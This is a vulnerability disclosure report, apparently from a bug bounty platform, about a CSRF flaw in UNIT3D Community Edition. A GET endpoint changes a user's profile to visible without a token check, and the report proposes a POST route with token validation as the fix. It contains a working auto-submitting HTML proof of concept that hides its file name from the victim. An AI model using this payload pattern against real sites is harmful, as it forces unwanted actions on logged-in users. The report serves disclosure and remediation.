Cross-Site Request Forgery (CSRF) in hdinnovations/unit3d-community-edition
Valid
Reported on Aug 4th 2021
✍️ Description
An attacker can change a logged-in user's profile state to visible by getting that user to visit an attacker-controlled page. The state-changing endpoint is reached with a plain GET request, which the browser sends with the victim's session cookie, and no CSRF token is checked on it.
🕵️♂️ Proof of Concept
1. While logged in to the target site, open this POC.html in a browser.
2. Check your profile: its state has been changed to visible.
<html>
<body>
<!-- Rewrite the address bar so the PoC file name is not shown to the victim -->
<script>history.pushState('', '', '/')</script>
<!-- No method attribute, so the form submits a GET request. The browser attaches the
     victim's session cookie because a top-level GET navigation is allowed under SameSite=Lax -->
<form action="https://unit3d.site/users/UNIT3D/settings/visible">
<input type="submit" value="Submit request" />
</form>
<!-- Submit automatically: nothing is required of the victim beyond loading the page -->
<script>
document.forms[0].submit();
</script>
</body>
</html>
💥 Impact
This vulnerability lets an attacker force a logged-in user to change their profile state to visible without intending to.
💥 Test
Tested on Edge, Firefox, Chrome and Safari.
💥 Fix
A state-changing action should not be reachable over GET. Register the route in web.php as a POST route and require the CSRF token in the submitted form: Laravel's VerifyCsrfToken middleware skips GET, HEAD and OPTIONS requests, so a GET route is never token-checked no matter what the form contains. With the session cookie set to SameSite=Lax, a cross-site POST is also made without the cookie, so the forged request arrives with no session at all. Keep the token check as well, so the protection does not depend on the browser's cookie policy alone.
Occurrences
web.php#L345
We have contacted a member of the hdinnovations/unit3d-community-edition team and are waiting to hear back (posted 2 years ago).